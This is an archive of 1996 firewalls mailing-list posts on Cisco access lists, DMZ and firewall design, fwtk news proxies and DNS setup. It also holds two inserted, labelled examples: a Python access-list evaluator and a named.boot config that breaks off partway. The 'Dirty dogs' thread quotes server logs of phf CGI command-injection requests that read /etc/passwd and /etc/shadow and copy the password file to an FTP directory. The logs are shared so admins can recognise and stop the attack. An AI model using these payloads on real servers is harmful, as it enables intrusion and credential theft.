kuddp45.zilker.net unknown - [17/Jun/1996:00:38:24 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Agrep%20ftp%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 138
kuddp45.zilker.net unknown - [17/Jun/1996:00:40:21 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acp%20/etc/passwd%20%7Eftp/incoming%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 119
kuddp45.zilker.net unknown - [17/Jun/1996:00:40:46 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 116
kuddp45.zilker.net unknown - [17/Jun/1996:00:41:22 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 300
kuddp45.zilker.net unknown - [17/Jun/1996:00:42:49 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aecho%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 95
kuddp45.zilker.net unknown - [17/Jun/1996:00:43:18 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20%7Eftp/incoming%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 107
hugh.ndl.net unknown - [30/Jun/1996:00:31:31 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 116
[Mon Jun 17 00:35:24 1996] HTTPd: send aborted for annex059.ridgecrest.ca.us, URL: /cgi-bin/phf

Hmmm... obviously the same person on zilker.net and ridgecrest.ca.us grrrr...

Best regards, Gunni ========================================================================= Gunnar Ingvi Þórisson E-Mail address: gunni@if.is Kerfisstjóri og forritari, system administrator and programmer Íslensk forritaþróun hf. (Iceland Software Inc.)
Suðurlandsbraut 4, IS-108 Reykjavík, Ísland Phone: (+354) 588-1511 Fax: (+354) 588-8728 =========================================================================

From firewalls-owner Thu Jul 11 03:19:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA26007 for firewalls-outgoing; Thu, 11 Jul 1996 03:09:26 -0700 (PDT) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA25977 for ; Thu, 11 Jul 1996 03:09:03 -0700 (PDT) Received: from tidtest.total.fr (tidtest.total.fr [146.249.165.73]) by pegase.total.fr (8.6.8/8.6.6) with SMTP id MAA11955; Thu, 11 Jul 1996 12:06:58 +0200 Received: by tidtest.total.fr (4.1/SMI-4.1) Message-Id: <9607111005.AA23852@tidtest.total.fr> To: "John M. Shaw" Cc: firewalls@greatcircle.com Subject: Re: Re[2]: Newbie Cisco Access-List Question In-Reply-To: Your message of "Wed, 10 Jul 1996 10:38:05 CST." X-Cuse: "The dog ate my network" Date: Thu, 11 Jul 1996 12:05:32 +0100 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

In message <9606108370.AA837020476@cc1.dttus.com>, "John M. Shaw" writes:
> Is it the same for "ip route":
> If I have 2 lines from my ISP hooked up to the serial lines on my router:
> ip route 0.0.0.0 0.0.0.0 Serial0
> ip route 0.0.0.0 0.0.0.0 Serial1
> Will anything get sent over Serial1?
> Is there a way to somewhat balance the load between the 2 lines?

Yes to both questions, with qualifications:
- if you use fast switching (default), or autonomous/silicon/optimum switching on the high-end boxes, load balancing is per-destination (ie, once an interface has been chosen for a given destination address, all packets to that destination will go out that interface)
- if you use process switching (no ip route-cache on the interface or some other configuration option that doesn't work with caching), load balancing is per-packet.
BTW, these questions are best asked of cisco@spot.colorado.edu. HTH Michel Lavondes (lavondes@tidtest.total.fr) #include Governments are guilty until proved innocent

From firewalls-owner Thu Jul 11 03:34:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA26467 for firewalls-outgoing; Thu, 11 Jul 1996 03:19:07 -0700 (PDT) Received: from h01.scientia.com (h01.scientia.com [194.216.183.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA26453 for ; Thu, 11 Jul 1996 03:18:58 -0700 (PDT) Received: by h01.scientia.com with SMTP id LAA07208 for ; Thu, 11 Jul 1996 11:16:35 +0100 Message-Id: <199607111016.LAA07208@h01.scientia.com> X-Sender: firewall@pop-server X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jul 1996 10:16:15 +0100 To: firewalls@greatcircle.com From: Ian Miller Subject: Re: Threats and Nasty Emails Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At 17:17 09/07/96 -0700, Michael Dillon wrote: >This is easier than you think. If you print out copies of all messages >with full headers as well as your log files then you may find that the >courts accept that as conclusive proof. There have been cases in the USA >where such evidence was accepted. You should make sure to do the printouts >immediately in front of witnesses and then have them notarized. >

I don't know about the position in the USA. However the person making the threats is in the UK and would have to be sued here. In a very recent case computer evidence was declared inadmissible because the organisation relying on it refused to allow the defendant's security consultant access to their system to carry out a security audit. [The case of a policeman accused of fraud over phantom cash-machine withdrawals.] In the case of trying to prove the source of e-mail, you would have to audit every machine that had contributed to the headers.
I think this would be a helpless cause. Log files may be considered "conclusive proof" in the USA, but they quite rightly aren't in the UK. Ian From firewalls-owner Thu Jul 11 03:42:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA26124 for firewalls-outgoing; Thu, 11 Jul 1996 03:11:03 -0700 (PDT) Received: from dns2 (dns2.datlog.co.uk [193.128.221.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA26072 for ; Thu, 11 Jul 1996 03:10:39 -0700 (PDT) Received: from luggage.datlog.co.uk by dns2 with smtp Message-Id: Date: Thu, 11 Jul 1996 11:07:58 +0000 From: Graham Jack Subject: Re: Web Server on the DMZ To: firewalls@greatcircle.com X-Mailer: PC Mail Manager 1.0 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk BobK suggested: > Yes, you can put the web server on your DMZ, but the real answer here > is to run TWO firewalls. > Like so: > - --company net ---/Corp-Firewall/---DMZ w/servers---/outer firewall/ --Internet > The job of the Corp-Firewall is to protect the company network, the > job of the outer firewall is to protect the exposed servers. As originally conceived, the job of the firewall was to provide a high security door into an area where lower security controls are in use. The logic for this is that in a large network, you cannot keep all the systems on your network configured to a suitable level of security to resist a direct attack from the network, so you implement the serious controls in one place ("put all your eggs in one basket - but WATCH THAT BASKET" as someone famous once said). As long as the number of systems exposed to the Internet is small, there is no reason why they can't be secured sufficiently to not require additional protection - what controls can you put in the outer firewall that you can't implement (more) effectively on the exposed server itself? 
You have to accept the risk that systems exposed to direct connections from the Internet may be compromised. The wise designer places an exposed server on the wrong side of a filtering bridge so that, even if it is compromised, it can't snoop on the traffic that flows between the outer router and the firewall component(s). -- Regards, ------------------------------------------------------------------------ Graham Jack Data Logic Ltd Consultant CI Tower, St. Georges Square EMail: gjack@datlog.co.uk High Street, New Malden Direct: +44 181 388-0334 Surrey, KT3 4HH Switchboard: +44 181 715-9696 FAX: +44 181 715-1771 ------------------------------------------------------------------------ From firewalls-owner Thu Jul 11 04:19:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA29715 for firewalls-outgoing; Thu, 11 Jul 1996 04:05:39 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA29708 for ; Thu, 11 Jul 1996 04:05:29 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id NAA06296; Thu, 11 Jul 1996 13:00:51 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607111303.AA02759@pamela.sic.se> Date: Thu, 11 Jul 1996 13:03:02 +0100 From: "Stefan Berg" To: "De Mees, Frederic" Cc: firewalls@GreatCircle.com Subject: Re: News-proxy for TIS fwtk? Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk De Mees, Frederik wrote: > > Hello all of you three ! > > >>Date: Wed, 10 Jul 1996 13:36:44 +0100 > >>From: "Stefan Berg" > >>Subject: Re: News-proxy for TIS fwtk? > >> > >>Great thanks to Shepherd Rudie [I HOPE YOUR ADDRESS IS OK !! FDM] > >>and Jean-Francois Zwobada for your help. 
> >>My news works just fine now :) > >> > >>/Stefan > > What happens more and more often is that companies (Microsoft for > example) offer their support via a private news-server, sometimes > needing authentication. > > If you hardwire a plug-gw to your usual news server , the connection > to any other news server remains impossible. > > I imagined putting more plug-gw's on other ports but newsread programs > do not allow changing the default port (119). > > Can you help ? Well here is a little suggestion (firewall-subscribers correct me) that may work if you want different news servers for _different machines_: I put in the rule: plug-gw: port nntp *.my.domain -plug-to external.news.server -port nntp If you want to be able to connect to several different news servers you could do this perhaps: plug-gw: port nntp 1.my.domain -plug-to 1external.news.server -port nntp plug-gw: port nntp 2.my.domain -plug-to 2external.news.server -port nntp where 1.my.domain connects to the 1external.news.server and 2.my.domain connects to 2external.news.server. Just an idea. Haven't tried it yet. /Stefan -- _______________________________________________________ Stefan Berg ISDN Group of Sweden / Svenska InternetCentralen Phone: +46-8-6677010 E-mail: stefan@sic.se WWW: http://www.sic.se/ http://www.isdn.se/ _______________________________________________________ Recursive; adj. 
see Recursive

From firewalls-owner Thu Jul 11 05:19:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA04916 for firewalls-outgoing; Thu, 11 Jul 1996 05:03:24 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA04906 for ; Thu, 11 Jul 1996 05:03:14 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id NAA11011; Thu, 11 Jul 1996 13:57:19 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31E4EC06.1BA4@apogee-com.fr> Date: Thu, 11 Jul 1996 13:56:54 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: Stefan Berg Cc: "De Mees, Frederic" Subject: Re: News-proxy for TIS fwtk? References: <9607111303.AA02759@pamela.sic.se> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi Stefan, You're absolutely right, this is the way to do it if you want different news servers available for different internal clients. With the Gauntlet, if you omit the "-plug-to" option, every address declared in the 'source field' is able to connect to everywhere. It is not true with the toolkit, unfortunately. With the toolkit, you should consider listening on a different port for every external server you want to contact. But it seems that news clients don't want to connect to something different from 119...

plug-gw: port nntp1 mynet.* -plug-to 1external.news.server -port nntp
plug-gw: port nntp2 mynet.* -plug-to 2external.news.server -port nntp
...
Regards, Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________

From firewalls-owner Thu Jul 11 05:34:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA05724 for firewalls-outgoing; Thu, 11 Jul 1996 05:23:47 -0700 (PDT) Received: from gatekeeper.ray.com (gatekeeper.ray.com [138.125.162.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA05717 for ; Thu, 11 Jul 1996 05:23:40 -0700 (PDT) Received: (mailer@localhost) by gatekeeper.ray.com (8.7.5/8.7.3) id IAA24415; Thu, 11 Jul 1996 08:20:25 -0400 Received: from eoits1.eo.ray.com by gatekeeper.ray.com; Thu Jul 11 08:19:34 1996 Received: by eo.ray.com (5.0/SMI-SVR4) Date: Thu, 11 Jul 1996 08:19:12 -0400 From: hhantman@eo.ray.com (Howard Hantman) Message-Id: <9607111219.AA25794@eo.ray.com> To: dcarney@hypersurf.com, james@mail.state.mo.us Subject: Re: Dirty dogs Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Well, folks, whether or not you try to contact genstar.net or zilker.net is one issue, but I would definitely do SOMETHING, at least on your own systems. Both of these log snippets indicate a SUCCESSFUL use of this attack. Especially now that you've published your vulnerability to the world, I hope you're disabling the script! Howard Hantman Manager, Technology Integration Corporate ITS Raytheon Company

> From: Don Carney > To: firewalls@GreatCircle.COM, james@mail.state.mo.us > Subject: Re: Dirty dogs > > We had one on July 2nd.
> > slip50.genstar.net - - [02/Jul/1996:16:46:55 -0700] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 27121 > From: gunni@if.is (Gunnar Ingvi Thorisson) > Subject: Re: Dirty dogs > To: firewalls@GreatCircle.COM > Date: Thu, 11 Jul 1996 09:13:22 +0000 (GMT) > Mime-Version: 1.0 > Content-Transfer-Encoding: quoted-printable >
> annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:28:29 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 116
> annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:04 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 7241
> annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:48 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 7241
> annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:29:57 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 154
> annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:31:30 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 105
> annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:32:06 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 175
> annex059.ridgecrest.ca.us unknown - [17/Jun/1996:00:35:24 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 0
> kuddp45.zilker.net unknown - [17/Jun/1996:00:35:44 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 175
> kuddp45.zilker.net unknown - [17/Jun/1996:00:37:21 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20-la%20/etc/shadow%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 175
> kuddp45.zilker.net unknown - [17/Jun/1996:00:38:24 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Agrep%20ftp%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 138
> kuddp45.zilker.net unknown - [17/Jun/1996:00:40:21 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acp%20/etc/passwd%20%7Eftp/incoming%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 119
> kuddp45.zilker.net unknown - [17/Jun/1996:00:40:46 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 116
> kuddp45.zilker.net unknown - [17/Jun/1996:00:41:22 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 300
> kuddp45.zilker.net unknown - [17/Jun/1996:00:42:49 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aecho%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 95
> kuddp45.zilker.net unknown - [17/Jun/1996:00:43:18 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Als%20%7Eftp/incoming%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 107
> hugh.ndl.net unknown - [30/Jun/1996:00:31:31 +0000] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 116
> [Mon Jun 17 00:35:24 1996] HTTPd: send aborted for annex059.ridgecrest.ca.us, URL: /cgi-bin/phf
> > Hmmm... obviously the same person on zilker.net and ridgecrest.ca.us > grrrr... > > Kær kveðja, > Gunni From firewalls-owner Thu Jul 11 05:50:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA06280 for firewalls-outgoing; Thu, 11 Jul 1996 05:38:40 -0700 (PDT) Received: from choreo.ca (mail.choreo.ca [198.73.137.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA06269 for ; Thu, 11 Jul 1996 05:38:30 -0700 (PDT) Received: by nic.choreo.ca id <20482>; Thu, 11 Jul 1996 08:46:38 -0400 In-Reply-To: <199607102032.NAA21108@miles.greatcircle.com> References: Conversation <199607102032.NAA21108@miles.greatcircle.com> with last message <199607102032.NAA21108@miles.greatcircle.com> To: Firewalls@GreatCircle.COM Reply-To: jenw@choreo.ca Mime-Version: 1.0 From: Jen Woods Subject: Re: Firewalls-Digest V5 #412 Date: Thu, 11 Jul 1996 08:35:57 -0400 Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: quoted-printable Message-Id: <96Jul11.084638edt.20482@nic.choreo.ca> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To whom it may concern, Please remove my name from your distribution list for the Firewalls-Digest.
Thank You, Jennifer Woods ************************************************************************************************************************************************ Jennifer Woods Sales Associate Choreo Systems Inc. Place de Ville - Tower B 112 Kent Street, Suite 1300 Ottawa, ON K1P 5P2 Telephone: (613) 238-1050 Toll Free: (800) 565-8649 Fax: (613) 238-4453 Internet: jenw@choreo.ca www.choreo.ca From firewalls-owner Thu Jul 11 06:10:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA07016 for firewalls-outgoing; Thu, 11 Jul 1996 05:48:57 -0700 (PDT) Received: from gatekeeper2.mcimail.com (gatekeeper2.mcimail.com [192.147.45.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA07007 for ; Thu, 11 Jul 1996 05:48:51 -0700 (PDT) Received: from mailgate2.mcimail.com (mailgate2.mcimail.com [166.40.135.23]) by gatekeeper2.mcimail.com (8.6.12/8.6.10) with SMTP id MAA29175; Thu, 11 Jul 1996 12:49:50 GMT Received: from mcimail.com by mailgate2.mcimail.com id ab16074; Date: Thu, 11 Jul 96 07:43 EST From: Karl Janice To: firewalls Subject: Re: Newbie Cisco Access-List Question Message-Id: <82960711124328/0006731076PK5EM@MCIMAIL.COM> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk MHS: Source date is: 11-Jul-96 08:32 EST Yes, the order matters. First come, first served. You would get all ports gt 1023 EXCEPT 2049. ______________________________ Reply Separator _________________________________ Subject: Newbie Cisco Access-List Question Author: jshaw (John M. Shaw) { NAME: John M. Shaw | EMS: INTERNET | MBX: jshaw@dttus.com } at MCIMAIL Date: 7/10/96 9:00 AM Assuming 2 lines with same source, s-mask, dest, and d-mask: access-list 101 permit tcp source s-mask dest d-mask gt 1023 access-list 101 deny tcp source s-mask dest d-mask eq 2049 Which one takes precedence? Does the order matter? Any help would be greatly appreciated.
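The first-match semantics behind the access-list question above, as an added example that is not part of any message in the thread: a small Python evaluator for the two posted lines. Because the question states that both lines carry the same source, source mask, destination and destination mask, address matching is left out and only the protocol and the destination port (what `gt 1023` and `eq 2049` test in an extended list) are modelled. The entry names `AS_POSTED` and `DENY_FIRST` and the `shadowed()` check are this example's own.

```python
# Added example (not from the mailing list): first-match evaluation of the two
# Cisco access-list lines posted above, plus a shadowed-entry check.
# Assumes both lines share source/dest/masks (as the question states), so only
# protocol and destination port are modelled.
from dataclasses import dataclass


@dataclass(frozen=True)
class Ace:
    """One access-list entry, e.g. Ace('permit', 'tcp', 'gt', 1023)."""
    action: str        # "permit" or "deny"
    proto: str         # "tcp", "udp", ...
    port_op: str       # "eq", "gt", "lt" or "any" (no port operator given)
    port: int = 0

    def matches(self, proto, dport):
        if self.proto != proto:
            return False
        if self.port_op == "any":
            return True
        if self.port_op == "eq":
            return dport == self.port
        if self.port_op == "gt":
            return dport > self.port
        if self.port_op == "lt":
            return dport < self.port
        raise ValueError("unknown port operator: %s" % self.port_op)


def evaluate(acl, proto, dport):
    """Walk the list top to bottom and stop at the first matching entry.
    Returns (action, index); if nothing matches, the implicit 'deny any'
    at the end of every Cisco access list applies and index is None."""
    for index, ace in enumerate(acl):
        if ace.matches(proto, dport):
            return ace.action, index
    return "deny", None


def shadowed(acl, proto="tcp"):
    """Indices of entries that can never be reached: for every port they
    match, an earlier entry already matched. Brute-forces the 16-bit port
    space, which is cheap for a list of this size."""
    dead = []
    for i, ace in enumerate(acl):
        reachable = any(
            ace.matches(proto, p) and not any(e.matches(proto, p) for e in acl[:i])
            for p in range(65536)
        )
        if not reachable:
            dead.append(i)
    return dead


# The two lines exactly as posted: the broad permit first, then the deny.
AS_POSTED = [Ace("permit", "tcp", "gt", 1023), Ace("deny", "tcp", "eq", 2049)]
# Same two entries with the specific deny placed above the broad permit.
DENY_FIRST = [Ace("deny", "tcp", "eq", 2049), Ace("permit", "tcp", "gt", 1023)]

if __name__ == "__main__":
    for name, acl in (("as posted", AS_POSTED), ("deny first", DENY_FIRST)):
        action, idx = evaluate(acl, "tcp", 2049)
        print("%-10s tcp/2049 -> %s (entry %s), shadowed entries: %s"
              % (name, action, idx, shadowed(acl)))
```

With the lines in the order posted, a packet to tcp/2049 is matched by the `permit ... gt 1023` entry and the `deny ... eq 2049` entry is never consulted, which is why `shadowed(AS_POSTED)` reports it. The order in `DENY_FIRST` is the one that yields "everything above 1023 except 2049"; the general rule is to put specific denies above the broad permits they carve exceptions out of.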
From firewalls-owner Thu Jul 11 06:21:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA09486 for firewalls-outgoing; Thu, 11 Jul 1996 06:12:56 -0700 (PDT) Received: from isgate.is (isgate.is [193.4.58.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA09425 for ; Thu, 11 Jul 1996 06:12:33 -0700 (PDT) Received: from linda.if.is by isgate.is (8.7.5-M/ISnet/14-10-91); Thu, 11 Jul 1996 13:09:56 GMT Received: by linda.if.is (Secure/IFnet/26-04-96); Thu, 11 Jul 1996 13:09:54 GMT From: gunni@if.is (Gunnar Ingvi Thorisson) Message-Id: <199607111309.NAA10529@linda.if.is> Subject: Re: Dirty dogs To: hhantman@eo.ray.com (Howard Hantman) Date: Thu, 11 Jul 1996 13:09:53 +0000 (GMT) Cc: dcarney@hypersurf.com, james@mail.state.mo.us, firewalls@GreatCircle.COM In-Reply-To: <9607111219.AA25794@eo.ray.com> from "Howard Hantman" at Jul 11, 96 08:19:12 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > now that you've published your vulnerability to the world, I hope you're > disabling the script! Is that a question? Did that before I posted to that list, however, I tried out that script and it looks like he was not able to read my shadowed password file but only the /etc/passwd since the http daemon runs under suid www. > Howard Hantman > Manager, Technology Integration > Corporate ITS > Raytheon Company Best regards.. ========================================================================= Gunnar Ingvi Þórisson E-Mail address: gunni@if.is Kerfisstjóri og forritari, system administrator and programmer Íslensk forritaþróun hf. (Iceland Software Inc.)
Suðurlandsbraut 4, IS-108 Reykjavík, Ísland Sími: (+354) 588-1511 Fax: (+354) 588-8728 ========================================================================= From firewalls-owner Thu Jul 11 06:28:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA06141 for firewalls-outgoing; Thu, 11 Jul 1996 05:36:52 -0700 (PDT) Received: from mog.ucd.ie (mog.ucd.ie [193.1.143.84]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA06133 for ; Thu, 11 Jul 1996 05:36:43 -0700 (PDT) Message-Id: <199607111236.FAA06133@miles.greatcircle.com> Received: from mog.ucd.ie by mog.ucd.ie id <18982-0@mog.ucd.ie>; To: simon@webfactory.ie Subject: Re: DNS leakage Cc: firewalls-digest@greatcircle.com Date: Thu, 11 Jul 1996 13:31:57 +0100 From: Louis Twomey Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Simon, > The named.boot file on the internal server should also contain a "slave" line - > so that the internal server does not attempt to contact any other DNS servers, > regardless of how slow the external server (1.2.3.4) may be. Agreed. I mistakenly omitted this line. > The external server's resolv.conf should have a xfernets directive so that only > trusted external hosts can do a zone transfer. I am not convinced that this is necessary. Once a legitimate secondary has performed a zone transfer of one of your zones, then unless the secondary also applies an xfrnets directive in its named.boot file, your zone may be transferred from that nameserver by anyone. Being able to do a zone transfer directly from the external/firewall nameserver is often useful in trying to track down problems (errors in the zone file etc.). If anyone knows of a good reason to use the xfrnets option, then I would appreciate hearing it. > I don't think that there is any point in having the internal act as a secondary > to the external server. 
The internal server should have DNS entries > for all the machines on the network - and the external one should have just > those entries for machines that have direct (ie non-proxied) access to the > internet. > Hence there is no need for the internal server to act as a secondary for the > external server - so the internal data would not be overwritten by the > (superfluous) secondary data. The one benefit in the configuration that I suggested is that for any addition to the external nameserver zone file, you do not have to make the same addition to the internal nameserver file in order for internal hosts to "see" the entry (the internal secondary copy of the data gets updated automatically at the next scheduled zone transfer), thus maintenance of the system is easier. It is certainly an unusual configuration in DNS terms, but it works with bind-4.9.3-B9 (although not with bind-4.9.3-REL). How do others handle this - keep both the internal and external zone files synchronised manually ? Regards, Louis.
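The split configuration the two DNS messages above are discussing, written out as a pair of BIND 4.9.x named.boot files. This is an added example, not a file posted by either participant. The address 1.2.3.4 for the external/firewall server is the one used in the thread; the zone name example.com, the internal range 192.168.1.0/24 and the secondary's address 5.6.7.8 are assumed values. Two points worth seeing in the files themselves: the `slave` line pairs with `forwarders` to make the internal server forward-only, and `xfrnets` is a named.boot directive on the external server, not a resolv.conf setting. Louis's variant of making the internal server a secondary for the external zone is not shown.

```conf
; named.boot on the INTERNAL nameserver (added example; example.com,
; 192.168.1.0/24 and 5.6.7.8 are assumed, 1.2.3.4 is from the thread).
; This server holds every internal host and never talks to the Internet.
directory   /etc/namedb
primary     example.com               example.com.zone
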